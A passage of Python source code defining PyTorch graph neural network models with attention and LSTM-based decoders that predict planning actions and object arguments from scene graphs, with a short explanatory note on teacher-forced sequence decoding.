        self.embed = nn.Linear(PRETRAINED_VECTOR_SIZE, n_hidden)
        self.fc1 = nn.Linear(n_hidden + n_hidden + n_hidden, n_hidden)
        self.fc2 = nn.Linear(n_hidden, n_hidden)
        self.fc3 = nn.Linear(n_hidden, len(possibleActions))
        self.p1 = nn.Linear(n_hidden + n_hidden + n_hidden, n_hidden)
        self.p2 = nn.Linear(n_hidden, n_hidden)
        self.p3 = nn.Linear(n_hidden, n_objects+1)
        self.q1 = nn.Linear(n_hidden + n_hidden + n_hidden, n_hidden)
        self.q2 = nn.Linear(n_hidden, n_hidden)
        self.q3 = nn.Linear(n_hidden, n_objects+1+n_states)
        self.activation = nn.LeakyReLU()
        self.metric1 = nn.Linear(in_feats, n_hidden)
        self.metric2 = nn.Linear(n_hidden, n_hidden)

    def forward(self, g, goalVec, goalObjectsVec):
        h = g.ndata['feat']
        for i, layer in enumerate(self.layers):
            h = layer(g, h)
        metric_part = g.ndata['feat']
        metric_part = self.activation(self.metric1(metric_part))
        metric_part = self.activation(self.metric2(metric_part))
        h = torch.cat([h, metric_part], dim=1)
        goalObjectsVec = self.activation(self.embed(torch.Tensor(goalObjectsVec)))
        scene_embedding = torch.sum(h, dim=0).view(1, -1)
        goal_embed = self.activation(self.embed(torch.Tensor(goalVec.reshape(1, -1))))
        final_to_decode = torch.cat([scene_embedding, goal_embed], 1)
        action = self.activation(self.fc1(final_to_decode))
        action = self.activation(self.fc2(action))
        action = self.activation(self.fc3(action))
        action = F.softmax(action, dim=1)
        pred1 = self.activation(self.p1(final_to_decode))
        pred1 = self.activation(self.p2(pred1))
        pred1 = F.softmax(self.activation(self.p3(pred1)), dim=1)
        pred2 = self.activation(self.q1(final_to_decode))
        pred2 = self.activation(self.q2(pred2))
        pred2 = F.softmax(self.activation(self.q3(pred2)), dim=1)
        return torch.cat((action, pred1, pred2), 1).flatten()
class GGCN_metric_att_Action(nn.Module):
    def __init__(self,
                 in_feats,
                 n_objects,
                 n_hidden,
                 n_states,
                 n_layers,
                 etypes,
                 activation,
                 dropout):
        super(GGCN_metric_att_Action, self).__init__()
        self.name = "GGCN_metric_att_Action_" + str(n_hidden) + "_" + str(n_layers)
        self.layers = nn.ModuleList()
        self.layers.append(GatedHeteroRGCNLayer(in_feats, n_hidden, etypes, activation=activation))
        for i in range(n_layers - 1):
            self.layers.append(GatedHeteroRGCNLayer(n_hidden, n_hidden, etypes, activation=activation))
        self.attention = nn.Linear(n_hidden + n_hidden + n_hidden, 1)
        self.embed = nn.Linear(PRETRAINED_VECTOR_SIZE, n_hidden)
        self.fc1 = nn.Linear(n_hidden + n_hidden + n_hidden, n_hidden)
        self.fc2 = nn.Linear(n_hidden, n_hidden)
        self.fc3 = nn.Linear(n_hidden, len(possibleActions))
        self.p1 = nn.Linear(n_hidden + n_hidden + n_hidden, n_hidden)
        self.p2 = nn.Linear(n_hidden, n_hidden)
        self.p3 = nn.Linear(n_hidden, n_objects+1)
        self.q1 = nn.Linear(n_hidden + n_hidden + n_hidden, n_hidden)
        self.q2 = nn.Linear(n_hidden, n_hidden)
        self.q3 = nn.Linear(n_hidden, n_objects+1+n_states)
        self.activation = nn.LeakyReLU()
        self.metric1 = nn.Linear(in_feats, n_hidden)
        self.metric2 = nn.Linear(n_hidden, n_hidden)

    def forward(self, g, goalVec, goalObjectsVec):
        h = g.ndata['feat']
        for i, layer in enumerate(self.layers):
            h = layer(g, h)
        metric_part = g.ndata['feat']
        metric_part = self.activation(self.metric1(metric_part))
        metric_part = self.activation(self.metric2(metric_part))
        h = torch.cat([h, metric_part], dim=1)
        goalObjectsVec = self.activation(self.embed(torch.Tensor(goalObjectsVec)))
        attn_embedding = torch.cat([h, goalObjectsVec.repeat(h.size(0)).view(h.size(0), -1)], 1)
        attn_weights = F.softmax(self.attention(attn_embedding), dim=0)
        scene_embedding = torch.mm(attn_weights.t(), h)
        goal_embed = self.activation(self.embed(torch.Tensor(goalVec.reshape(1, -1))))
        final_to_decode = torch.cat([scene_embedding, goal_embed], 1)
        action = self.activation(self.fc1(final_to_decode))
        action = self.activation(self.fc2(action))
        action = self.activation(self.fc3(action))
        action = F.softmax(action, dim=1)
        pred1 = self.activation(self.p1(final_to_decode))
        pred1 = self.activation(self.p2(pred1))
        pred1 = F.softmax(self.activation(self.p3(pred1)), dim=1)
        pred2 = self.activation(self.q1(final_to_decode))
        pred2 = self.activation(self.q2(pred2))
        pred2 = F.softmax(self.activation(self.q3(pred2)), dim=1)
        return torch.cat((action, pred1, pred2), 1).flatten()
class GGCN_metric_att_aseq_Action(nn.Module):
    def __init__(self,
                 in_feats,
                 n_objects,
                 n_hidden,
                 n_states,
                 n_layers,
                 etypes,
                 activation,
                 dropout):
        super(GGCN_metric_att_aseq_Action, self).__init__()
        self.name = "GGCN_metric_att_aseq_Action_" + str(n_hidden) + "_" + str(n_layers)
        self.layers = nn.ModuleList()
        self.layers.append(GatedHeteroRGCNLayer(in_feats, n_hidden, etypes, activation=activation))
        for i in range(n_layers - 1):
            self.layers.append(GatedHeteroRGCNLayer(n_hidden, n_hidden, etypes, activation=activation))
        self.attention = nn.Sequential(nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden, n_hidden), nn.Linear(n_hidden, 1))
        self.embed = nn.Linear(PRETRAINED_VECTOR_SIZE, n_hidden)
        self.fc1 = nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden, n_hidden)
        self.fc2 = nn.Linear(n_hidden, n_hidden)
        self.fc3 = nn.Linear(n_hidden, len(possibleActions))
        self.p1 = nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden, n_hidden)
        self.p2 = nn.Linear(n_hidden, n_hidden)
        self.p3 = nn.Linear(n_hidden, n_objects+1)
        self.q1 = nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden, n_hidden)
        self.q2 = nn.Linear(n_hidden, n_hidden)
        self.q3 = nn.Linear(n_hidden, n_objects+1+n_states)
        self.activation = nn.LeakyReLU()
        self.metric1 = nn.Linear(in_feats, n_hidden)
        self.metric2 = nn.Linear(n_hidden, n_hidden)
        self.action_lstm = nn.LSTM(len(possibleActions) + n_objects + 1 + n_objects + 1 + n_states, n_hidden)
        self.n_hidden = n_hidden
        self.n_objects = n_objects
        self.n_states = n_states

    def forward(self, g_list, goalVec, goalObjectsVec, a_list):
        a_list = [action2vec(i, self.n_objects, self.n_states) for i in a_list]
        predicted_actions = []
        lstm_hidden = (torch.randn(1, 1, self.n_hidden), torch.randn(1, 1, self.n_hidden))
        goalObjectsVec = self.activation(self.embed(torch.Tensor(goalObjectsVec)))
        goal_embed = self.activation(self.embed(torch.Tensor(goalVec.reshape(1, -1))))
        for ind, g in enumerate(g_list):
            h = g.ndata['feat']
            for i, layer in enumerate(self.layers):
                h = layer(g, h)
            metric_part = g.ndata['feat']
            metric_part = self.activation(self.metric1(metric_part))
            metric_part = self.activation(self.metric2(metric_part))
            h = torch.cat([h, metric_part], dim=1)
            if (ind != 0):
                lstm_out, lstm_hidden = self.action_lstm(a_list[ind-1].view(1, 1, -1), lstm_hidden)
            else:
                lstm_out = torch.zeros(1, 1, self.n_hidden)
            lstm_out = lstm_out.view(-1)
            attn_embedding = torch.cat([h, goalObjectsVec.repeat(h.size(0)).view(h.size(0), -1), lstm_out.repeat(h.size(0)).view(h.size(0), -1)], 1)
            attn_weights = F.softmax(self.attention(attn_embedding), dim=0)
            scene_embedding = torch.mm(attn_weights.t(), h)
            final_to_decode = torch.cat([scene_embedding, goal_embed, lstm_out.view(1, -1)], 1)
            action = self.activation(self.fc1(final_to_decode))
            action = self.activation(self.fc2(action))
            action = self.activation(self.fc3(action))
            action = F.softmax(action, dim=1)
            pred1 = self.activation(self.p1(final_to_decode))
            pred1 = self.activation(self.p2(pred1))
            pred1 = F.softmax(self.activation(self.p3(pred1)), dim=1)
            pred2 = self.activation(self.q1(final_to_decode))
            pred2 = self.activation(self.q2(pred2))
            pred2 = F.softmax(self.activation(self.q3(pred2)), dim=1)
            predicted_actions.append(torch.cat((action, pred1, pred2), 1).flatten())
        return predicted_actions
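The sequence-decoding pattern in the forward pass above (at step t, feed the *previous* step's gold action through the LSTM and condition step t's prediction on the recurrent state, with zero context at t = 0) reduces to this teacher-forcing skeleton. The `step_rnn` and `decode` functions are trivial stand-ins for `self.action_lstm` and the attention/decoder heads:

```python
def step_rnn(prev_action, state):
    # Stand-in for self.action_lstm: fold the previous action into the state.
    return [s + a for s, a in zip(state, prev_action)]

def decode(graph_embedding, state):
    # Stand-in for the attention pooling + fc/p/q decoder heads.
    return [g + s for g, s in zip(graph_embedding, state)]

def decode_sequence(graphs, gold_actions):
    state = [0.0, 0.0]              # lstm_out at step 0 is all zeros
    predicted = []
    for t, g in enumerate(graphs):
        if t > 0:                   # teacher forcing: feed the gold action t-1
            state = step_rnn(gold_actions[t - 1], state)
        predicted.append(decode(g, state))
    return predicted

out = decode_sequence([[1.0, 1.0], [2.0, 2.0]], [[0.5, 0.5], [9.0, 9.0]])
assert out[0] == [1.0, 1.0]         # step 0 sees zero context
assert out[1] == [2.5, 2.5]         # step 1 is conditioned on gold action 0
```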
class GGCN_metric_att_aseq_auto_Action(nn.Module):
    def __init__(self,
                 in_feats,
                 n_objects,
                 n_hidden,
                 n_states,
                 n_layers,
                 etypes,
                 activation,
                 dropout):
        super(GGCN_metric_att_aseq_auto_Action, self).__init__()
        self.name = "GGCN_metric_att_aseq_auto_Action_" + str(n_hidden) + "_" + str(n_layers)
        self.layers = nn.ModuleList()
        self.layers.append(GatedHeteroRGCNLayer(in_feats, n_hidden, etypes, activation=activation))
        for i in range(n_layers - 1):
            self.layers.append(GatedHeteroRGCNLayer(n_hidden, n_hidden, etypes, activation=activation))
        self.attention = nn.Sequential(nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden, n_hidden), nn.Linear(n_hidden, 1))
        self.embed = nn.Linear(PRETRAINED_VECTOR_SIZE, n_hidden)
        self.fc1 = nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden, n_hidden)
        self.fc2 = nn.Linear(n_hidden, n_hidden)
        self.fc3 = nn.Linear(n_hidden, len(possibleActions))
        self.p1 = nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden + len(possibleActions), n_hidden + n_hidden)
        self.p2 = nn.Linear(n_hidden + n_hidden, n_hidden)
        self.p3 = nn.Linear(n_hidden, n_objects+1)
        self.q1 = nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden + len(possibleActions), n_hidden + n_hidden)
        self.q2 = nn.Linear(n_hidden + n_hidden, n_hidden)
        self.q3 = nn.Linear(n_hidden, n_objects+1+n_states)
        self.activation = nn.LeakyReLU()
        self.metric1 = nn.Linear(in_feats, n_hidden)
        self.metric2 = nn.Linear(n_hidden, n_hidden)
        self.action_lstm = nn.LSTM(len(possibleActions) + n_objects + 1 + n_objects + 1 + n_states, n_hidden)
        self.n_hidden = n_hidden
        self.n_objects = n_objects
        self.n_states = n_states

    def forward(self, g_list, goalVec, goalObjectsVec, a_list):
        a_list = [action2vec(i, self.n_objects, self.n_states) for i in a_list]
        predicted_actions = []
        lstm_hidden = (torch.randn(1, 1, self.n_hidden), torch.randn(1, 1, self.n_hidden))
        goalObjectsVec = self.activation(self.embed(torch.Tensor(goalObjectsVec)))
        goal_embed = self.activation(self.embed(torch.Tensor(goalVec.reshape(1, -1))))
        for ind, g in enumerate(g_list):
            h = g.ndata['feat']
            for i, layer in enumerate(self.layers):
                h = layer(g, h)
            metric_part = g.ndata['feat']
            metric_part = self.activation(self.metric1(metric_part))
            metric_part = self.activation(self.metric2(metric_part))
            h = torch.cat([h, metric_part], dim=1)
            if (ind != 0):
                lstm_out, lstm_hidden = self.action_lstm(a_list[ind-1].view(1, 1, -1), lstm_hidden)
            else:
                lstm_out = torch.zeros(1, 1, self.n_hidden)
            lstm_out = lstm_out.view(-1)
            attn_embedding = torch.cat([h, goalObjectsVec.repeat(h.size(0)).view(h.size(0), -1), lstm_out.repeat(h.size(0)).view(h.size(0), -1)], 1)
            attn_weights = F.softmax(self.attention(attn_embedding), dim=0)
            scene_embedding = torch.mm(attn_weights.t(), h)
            final_to_decode = torch.cat([scene_embedding, goal_embed, lstm_out.view(1, -1)], 1)
            action = self.activation(self.fc1(final_to_decode))
            action = self.activation(self.fc2(action))
            action = self.activation(self.fc3(action))
            action = F.softmax(action, dim=1)
            # Condition the argument decoders on a hard one-hot of the
            # predicted action rather than its soft distribution.
            pred_action_values = list(action[0])
            ind_max_action = pred_action_values.index(max(pred_action_values))
            one_hot_action = [0 for i in range(len(pred_action_values))]
            one_hot_action[ind_max_action] = 1
            one_hot_action = torch.Tensor(one_hot_action).view(1, -1)
            pred1 = self.activation(self.p1(torch.cat([final_to_decode, one_hot_action], 1)))
            pred1 = self.activation(self.p2(pred1))
            pred1 = F.softmax(self.activation(self.p3(pred1)), dim=1)
            pred2 = self.activation(self.q1(torch.cat([final_to_decode, one_hot_action], 1)))
            pred2 = self.activation(self.q2(pred2))
            pred2 = F.softmax(self.activation(self.q3(pred2)), dim=1)
            predicted_actions.append(torch.cat((action, pred1, pred2), 1).flatten())
        return predicted_actions
class GGCN_metric_att_aseq_L_Action(nn.Module):
    def __init__(self,
                 in_feats,
                 n_objects,
                 n_hidden,
                 n_states,
                 n_layers,
                 etypes,
                 activation,
                 dropout):
        super(GGCN_metric_att_aseq_L_Action, self).__init__()
        self.name = "GGCN_metric_att_aseq_L_Action_" + str(n_hidden) + "_" + str(n_layers)
        self.layers = nn.ModuleList()
        self.layers.append(GatedHeteroRGCNLayer(in_feats, n_hidden, etypes, activation=activation))
        for i in range(n_layers - 1):
            self.layers.append(GatedHeteroRGCNLayer(n_hidden, n_hidden, etypes, activation=activation))
        self.attention = nn.Sequential(nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden, n_hidden), nn.Linear(n_hidden, 1))
        self.embed = nn.Linear(PRETRAINED_VECTOR_SIZE, n_hidden)
        self.fc1 = nn.Linear(n_hidden * 4, n_hidden)
        self.fc2 = nn.Linear(n_hidden, n_hidden)
        self.fc3 = nn.Linear(n_hidden, len(possibleActions))
        self.p1_object = nn.Linear(n_hidden * 5, n_hidden)
        self.p2_object = nn.Linear(n_hidden, n_hidden)
        self.p3_object = nn.Linear(n_hidden, 1)
        self.p1_no_object = nn.Linear(n_hidden * 4, n_hidden)
        self.p2_no_object = nn.Linear(n_hidden, n_hidden)
        self.p3_no_object = nn.Linear(n_hidden, 1)
        self.q1_object = nn.Linear(n_hidden * 5, n_hidden)
        self.q2_object = nn.Linear(n_hidden, n_hidden)
        self.q3_object = nn.Linear(n_hidden, 1)
        self.q1_no_object = nn.Linear(n_hidden * 4, n_hidden)
        self.q2_no_object = nn.Linear(n_hidden, n_hidden)
        self.q3_no_object = nn.Linear(n_hidden, 1)
        self.q1_state = nn.Linear(n_hidden * 4, n_hidden)
        self.q2_state = nn.Linear(n_hidden, n_hidden)
        self.q3_state = nn.Linear(n_hidden, n_states)
        self.activation = nn.LeakyReLU()
        self.metric1 = nn.Linear(in_feats, n_hidden)
        self.metric2 = nn.Linear(n_hidden, n_hidden)
        self.action_lstm = nn.LSTM(len(possibleActions) + n_objects + 1 + n_objects + 1 + n_states, n_hidden)
        self.n_hidden = n_hidden
        self.n_objects = n_objects
        self.n_states = n_states
        l = []
        for i in range(n_objects):
            l.append(object2vec[idx2object[i]])
        self.object_vec = torch.Tensor(l)

    def forward(self, g_list, goalVec, goalObjectsVec, a_list):
        a_list = [action2vec(i, self.n_objects, self.n_states) for i in a_list]
        predicted_actions = []
        lstm_hidden = (torch.randn(1, 1, self.n_hidden), torch.randn(1, 1, self.n_hidden))
        goalObjectsVec = self.activation(self.embed(torch.Tensor(goalObjectsVec)))
        goal_embed = self.activation(self.embed(torch.Tensor(goalVec.reshape(1, -1))))
        for ind, g in enumerate(g_list):
            h = g.ndata['feat']
            for i, layer in enumerate(self.layers):
                h = layer(g, h)
            metric_part = g.ndata['feat']
            metric_part = self.activation(self.metric1(metric_part))
            metric_part = self.activation(self.metric2(metric_part))
            h = torch.cat([h, metric_part], dim=1)
            if ind != 0:
                lstm_out, lstm_hidden = self.action_lstm(a_list[ind - 1].view(1, 1, -1), lstm_hidden)
            else:
                lstm_out = torch.zeros(1, 1, self.n_hidden)
            lstm_out = lstm_out.view(-1)
            attn_embedding = torch.cat([h, goalObjectsVec.repeat(h.size(0)).view(h.size(0), -1), lstm_out.repeat(h.size(0)).view(h.size(0), -1)], 1)
            attn_weights = F.softmax(self.attention(attn_embedding), dim=0)
            scene_embedding = torch.mm(attn_weights.t(), h)
            final_to_decode = torch.cat([scene_embedding, goal_embed, lstm_out.view(1, -1)], 1)
            action = self.activation(self.fc1(final_to_decode))
            action = self.activation(self.fc2(action))
            action = self.activation(self.fc3(action))
            action = F.softmax(action, dim=1)
            # Predicting the first argument of the action
            pred1_object = self.activation(self.p1_object(
                torch.cat([final_to_decode.view(-1).repeat(self.n_objects).view(self.n_objects, -1), self.activation(self.embed(self.object_vec))], 1)))
            pred1_object = self.activation(self.p2_object(pred1_object))
            pred1_object = torch.sigmoid(self.p3_object(pred1_object))
            pred1_no_object = self.activation(self.p1_no_object(final_to_decode))
            pred1_no_object = self.activation(self.p2_no_object(pred1_no_object))
            pred1_no_object = torch.sigmoid(self.p3_no_object(pred1_no_object))
            # Predicting the second argument of the action
            pred2_object = self.activation(self.q1_object(
                torch.cat([final_to_decode.view(-1).repeat(self.n_objects).view(self.n_objects, -1), self.activation(self.embed(self.object_vec))], 1)))
            pred2_object = self.activation(self.q2_object(pred2_object))
            pred2_object = torch.sigmoid(self.q3_object(pred2_object))
            pred2_no_object = self.activation(self.q1_no_object(final_to_decode))
            pred2_no_object = self.activation(self.q2_no_object(pred2_no_object))
            pred2_no_object = torch.sigmoid(self.q3_no_object(pred2_no_object))
            pred2_state = self.activation(self.q1_state(final_to_decode))
            pred2_state = self.activation(self.q2_state(pred2_state))
            pred2_state = F.softmax(self.q3_state(pred2_state), dim=1)
            predicted_actions.append(torch.cat((action, pred1_object.view(1, -1), pred1_no_object, pred2_object.view(1, -1), pred2_no_object, pred2_state), 1).flatten())
        return predicted_actions
class GGCN_metric_att_aseq_tool_Action(nn.Module):
    def __init__(self,
                 in_feats,
                 n_objects,
                 n_hidden,
                 n_states,
                 n_layers,
                 etypes,
                 activation,
                 dropout):
        super(GGCN_metric_att_aseq_tool_Action, self).__init__()
        self.name = "GGCN_metric_att_aseq_tool_Action_" + str(n_hidden) + "_" + str(n_layers)
        self.layers = nn.ModuleList()
        self.layers.append(GatedHeteroRGCNLayer(in_feats, n_hidden, etypes, activation=activation))
        for i in range(n_layers - 1):
            self.layers.append(GatedHeteroRGCNLayer(n_hidden, n_hidden, etypes, activation=activation))
        self.attention = nn.Sequential(nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden + 1, n_hidden), nn.Linear(n_hidden, 1))
        self.embed = nn.Linear(PRETRAINED_VECTOR_SIZE, n_hidden)
        self.fc1 = nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden, n_hidden)
        self.fc2 = nn.Linear(n_hidden, n_hidden)
        self.fc3 = nn.Linear(n_hidden, len(possibleActions))
        self.p1 = nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden, n_hidden)
        self.p2 = nn.Linear(n_hidden, n_hidden)
        self.p3 = nn.Linear(n_hidden, n_objects + 1)
        self.q1 = nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden, n_hidden)
        self.q2 = nn.Linear(n_hidden, n_hidden)
        self.q3 = nn.Linear(n_hidden, n_objects + 1 + n_states)
        self.activation = nn.LeakyReLU()
        self.metric1 = nn.Linear(in_feats, n_hidden)
        self.metric2 = nn.Linear(n_hidden, n_hidden)
        self.action_lstm = nn.LSTM(len(possibleActions) + n_objects + 1 + n_objects + 1 + n_states, n_hidden)
        self.n_hidden = n_hidden
        self.n_objects = n_objects
        self.n_states = n_states

    def forward(self, g_list, goalVec, goalObjectsVec, a_list, object_likelihoods):
        a_list = [action2vec(i, self.n_objects, self.n_states) for i in a_list]
        predicted_actions = []
        lstm_hidden = (torch.randn(1, 1, self.n_hidden), torch.randn(1, 1, self.n_hidden))
        goalObjectsVec = self.activation(self.embed(torch.Tensor(goalObjectsVec)))
        goal_embed = self.activation(self.embed(torch.Tensor(goalVec.reshape(1, -1))))
        for ind, g in enumerate(g_list):
            h = g.ndata['feat']
            for i, layer in enumerate(self.layers):
                h = layer(g, h)
            metric_part = g.ndata['feat']
            metric_part = self.activation(self.metric1(metric_part))
            metric_part = self.activation(self.metric2(metric_part))
            h = torch.cat([h, metric_part], dim=1)
            if ind != 0:
                lstm_out, lstm_hidden = self.action_lstm(a_list[ind - 1].view(1, 1, -1), lstm_hidden)
            else:
                lstm_out = torch.zeros(1, 1, self.n_hidden)
            lstm_out = lstm_out.view(-1)
            attn_embedding = torch.cat([h, goalObjectsVec.repeat(h.size(0)).view(h.size(0), -1), lstm_out.repeat(h.size(0)).view(h.size(0), -1), object_likelihoods[ind].view(h.size(0), -1)], 1)
            attn_weights = F.softmax(self.attention(attn_embedding), dim=0)
            scene_embedding = torch.mm(attn_weights.t(), h)
            final_to_decode = torch.cat([scene_embedding, goal_embed, lstm_out.view(1, -1)], 1)
            action = self.activation(self.fc1(final_to_decode))
            action = self.activation(self.fc2(action))
            action = self.activation(self.fc3(action))
            action = F.softmax(action, dim=1)
            pred1 = self.activation(self.p1(final_to_decode))
            pred1 = self.activation(self.p2(pred1))
            pred1 = F.softmax(self.activation(self.p3(pred1)), dim=1)
            pred2 = self.activation(self.q1(final_to_decode))
            pred2 = self.activation(self.q2(pred2))
            pred2 = F.softmax(self.activation(self.q3(pred2)), dim=1)
            predicted_actions.append(torch.cat((action, pred1, pred2), 1).flatten())
        return predicted_actions
class GGCN_metric_att_aseq_tool_auto_Action(nn.Module):
    def __init__(self,
                 in_feats,
                 n_objects,
                 n_hidden,
                 n_states,
                 n_layers,
                 etypes,
                 activation,
                 dropout):
        super(GGCN_metric_att_aseq_tool_auto_Action, self).__init__()
        self.name = "GGCN_metric_att_aseq_tool_auto_Action_" + str(n_hidden) + "_" + str(n_layers)
        self.layers = nn.ModuleList()
        self.layers.append(GatedHeteroRGCNLayer(in_feats, n_hidden, etypes, activation=activation))
        for i in range(n_layers - 1):
            self.layers.append(GatedHeteroRGCNLayer(n_hidden, n_hidden, etypes, activation=activation))
        self.attention = nn.Sequential(nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden + 1, n_hidden), nn.Linear(n_hidden, 1))
        self.embed = nn.Linear(PRETRAINED_VECTOR_SIZE, n_hidden)
        self.fc1 = nn.Linear(n_hidden + n_hidden + n_hidden + n_hidden, n_hidden)
        self.fc2 = nn.Linear(n_hidden, n_hidden)
        self.fc3 = nn.Linear(n_hidden, len(possibleActions))
        self.p1 = nn.Linear(len(possibleActions) + n_hidden + n_hidden + n_hidden + n_hidden, n_hidden)
        self.p2 = nn.Linear(n_hidden, n_hidden)
        self.p3 = nn.Linear(n_hidden, n_objects + 1)
        self.q1 = nn.Linear(len(possibleActions) + n_objects + 1 + n_hidden + n_hidden + n_hidden + n_hidden, n_hidden)
        self.q2 = nn.Linear(n_hidden, n_hidden)
        self.q3 = nn.Linear(n_hidden, n_objects + 1 + n_states)
        self.activation = nn.LeakyReLU()
        self.metric1 = nn.Linear(in_feats, n_hidden)
        self.metric2 = nn.Linear(n_hidden, n_hidden)
        self.action_lstm = nn.LSTM(len(possibleActions) + n_objects + 1 + n_objects + 1 + n_states, n_hidden)
        self.n_hidden = n_hidden
        self.n_objects = n_objects
        self.n_states = n_states

    def forward(self, g_list, goalVec, goalObjectsVec, a_list, object_likelihoods):
        a_list = [action2vec(i, self.n_objects, self.n_states) if i else None for i in a_list]
        predicted_actions = []
        lstm_hidden = (torch.randn(1, 1, self.n_hidden), torch.randn(1, 1, self.n_hidden))
        goalObjectsVec = self.activation(self.embed(torch.Tensor(goalObjectsVec)))
        goal_embed = self.activation(self.embed(torch.Tensor(goalVec.reshape(1, -1))))
        for ind, g in enumerate(g_list):
            h = g.ndata['feat']
            for i, layer in enumerate(self.layers):
                h = layer(g, h)
            metric_part = g.ndata['feat']
            metric_part = self.activation(self.metric1(metric_part))
            metric_part = self.activation(self.metric2(metric_part))
            h = torch.cat([h, metric_part], dim=1)
            if ind != 0:
                lstm_out, lstm_hidden = self.action_lstm(a_list[ind - 1].view(1, 1, -1), lstm_hidden)
            else:
                lstm_out = torch.zeros(1, 1, self.n_hidden)
            lstm_out = lstm_out.view(-1)
            attn_embedding = torch.cat([h, goalObjectsVec.repeat(h.size(0)).view(h.size(0), -1), lstm_out.repeat(h.size(0)).view(h.size(0), -1), object_likelihoods[ind].view(h.size(0), -1)], 1)
            attn_weights = F.softmax(self.attention(attn_embedding), dim=0)
            scene_embedding = torch.mm(attn_weights.t(), h)
            final_to_decode = torch.cat([scene_embedding, goal_embed, lstm_out.view(1, -1)], 1)
            action = self.activation(self.fc1(final_to_decode))
            action = self.activation(self.fc2(action))
            action = self.activation(self.fc3(action))
            action = F.softmax(action, dim=1)
            pred_action_values = list(action[0])
            ind_max_action = pred_action_values.index(max(pred_action_values))
            one_hot_action = [0] * len(pred_action_values)
            one_hot_action[ind_max_action] = 1
            one_hot_action = torch.Tensor(one_hot_action).view(1, -1)
            pred1 = self.activation(self.p1(torch.cat([one_hot_action, final_to_decode], dim=1)))
            pred1 = self.activation(self.p2(pred1))
            pred1 = F.softmax(self.activation(self.p3(pred1)), dim=1)
            pred2 = self.activation(self.q1(torch.cat([action, pred1, final_to_decode], dim=1)))
            pred2 = self.activation(self.q2(pred2))
            pred2 = F.softmax(self.activation(self.q3(pred2)), dim=1)
            predicted_actions.append(torch.cat((action, pred1, pred2), 1).flatten())
        return predicted_actions
class DGL_AGCN_Action_List(nn.Module):
    def __init__(self,
                 in_feats,
                 n_objects,
                 n_hidden,
                 n_states,
                 n_layers,
                 etypes,
                 activation,
                 dropout,
                 num_states_in_list):
        super(DGL_AGCN_Action_List, self).__init__()
        self.name = "GatedHeteroRGCN_Attention_Action_List_" + str(n_hidden) + "_" + str(n_layers)
        self.layers = nn.ModuleList()
        self.layers.append(GatedHeteroRGCNLayer(in_feats, n_hidden, etypes, activation=activation))
        for i in range(n_layers - 1):
            self.layers.append(GatedHeteroRGCNLayer(n_hidden, n_hidden, etypes, activation=activation))
        self.attention = nn.Linear(n_hidden + n_hidden, 1)
        self.embed = nn.Linear(PRETRAINED_VECTOR_SIZE, n_hidden)
        self.fc1 = nn.Linear(n_hidden * num_states_in_list + n_hidden, n_hidden)
        self.fc2 = nn.Linear(n_hidden, n_hidden)
        self.fc3 = nn.Linear(n_hidden, len(possibleActions))
        self.p1 = nn.Linear(n_hidden * num_states_in_list + n_hidden, n_hidden)
        self.p2 = nn.Linear(n_hidden, n_hidden)
        self.p3 = nn.Linear(n_hidden, n_objects + 1)
        self.q1 = nn.Linear(n_hidden * num_states_in_list + n_hidden, n_hidden)
        self.q2 = nn.Linear(n_hidden, n_hidden)
        self.q3 = nn.Linear(n_hidden, n_objects + 1 + n_states)
        self.n_hidden = n_hidden
        self.activation = nn.LeakyReLU()
        self.num_states_in_list = num_states_in_list

    def forward(self, g_list, goalVec, goalObjectsVec):
        goalObjectsVec = self.activation(self.embed(torch.Tensor(goalObjectsVec)))
        goal_embed = self.activation(self.embed(torch.Tensor(goalVec.reshape(1, -1))))
        scene_embedding_list = [torch.zeros(1, self.n_hidden) for i in range(self.num_states_in_list - len(g_list))]
        for g in g_list:
            h = g.ndata['feat']
            for i, layer in enumerate(self.layers):
                h = layer(g, h)
            attn_embedding = torch.cat([h, goalObjectsVec.repeat(h.size(0)).view(h.size(0), -1)], 1)
            attn_weights = F.softmax(self.attention(attn_embedding), dim=0)
            # print(attn_weights)
            scene_embedding = torch.mm(attn_weights.t(), h)
            scene_embedding_list.append(scene_embedding)
        scene_embedding = torch.cat(scene_embedding_list, 1)
        final_to_decode = torch.cat([scene_embedding, goal_embed], 1)
        action = self.activation(self.fc1(final_to_decode))
        action = self.activation(self.fc2(action))
        action = self.activation(self.fc3(action))
        action = F.softmax(action, dim=1)
        pred1 = self.activation(self.p1(final_to_decode))
        pred1 = self.activation(self.p2(pred1))
        pred1 = F.softmax(self.activation(self.p3(pred1)), dim=1)
        pred2 = self.activation(self.q1(final_to_decode))
        pred2 = self.activation(self.q2(pred2))
        pred2 = F.softmax(self.activation(self.q3(pred2)), dim=1)
        return torch.cat((action, pred1, pred2), 1).flatten()
#############################################################################
class Metric_Action(nn.Module):
    def __init__(self,
                 in_feats,
                 n_objects,
                 n_hidden,
                 n_states,
                 n_layers,
                 etypes,
                 activation,
                 dropout):
        super(Metric_Action, self).__init__()
        self.etypes = etypes
        self.name = "Metric_Action_" + str(n_hidden) + "_" + str(n_layers)
        self.layers = nn.ModuleList()
        self.layers.append(nn.Linear(in_feats + n_objects * 4, n_hidden))
        for i in range(n_layers - 1):
            self.layers.append(nn.Linear(n_hidden, n_hidden))
        self.attention = nn.Linear(n_hidden + n_hidden, 1)
        self.embed = nn.Linear(PRETRAINED_VECTOR_SIZE, n_hidden)
        self.fc1 = nn.Linear(n_hidden + n_hidden, n_hidden)
        self.fc2 = nn.Linear(n_hidden, n_hidden)
        self.fc3 = nn.Linear(n_hidden, len(possibleActions))
        self.p1 = nn.Linear(n_hidden + n_hidden, n_hidden)
        self.p2 = nn.Linear(n_hidden, n_hidden)
        self.p3 = nn.Linear(n_hidden, n_objects + 1)
        self.q1 = nn.Linear(n_hidden + n_hidden, n_hidden)
        self.q2 = nn.Linear(n_hidden, n_hidden)
        self.q3 = nn.Linear(n_hidden, n_objects + 1 + n_states)
        self.activation = nn.LeakyReLU()

